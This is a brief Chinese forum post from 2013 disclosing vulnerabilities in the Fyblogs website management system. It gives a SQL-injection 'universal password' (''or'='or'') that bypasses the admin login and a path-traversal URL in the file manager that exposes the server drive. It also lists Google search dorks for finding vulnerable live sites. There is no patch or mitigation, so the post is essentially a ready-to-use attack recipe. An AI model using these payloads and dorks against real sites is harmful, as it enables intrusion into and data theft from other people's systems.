admin 发表于 2013-3-14 20:17:32

Fyblogs网站管理系统漏洞

后台万能密码 'or'='or'

后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../

漏洞证明:

谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?

页: [1]
查看完整版本: Fyblogs网站管理系统漏洞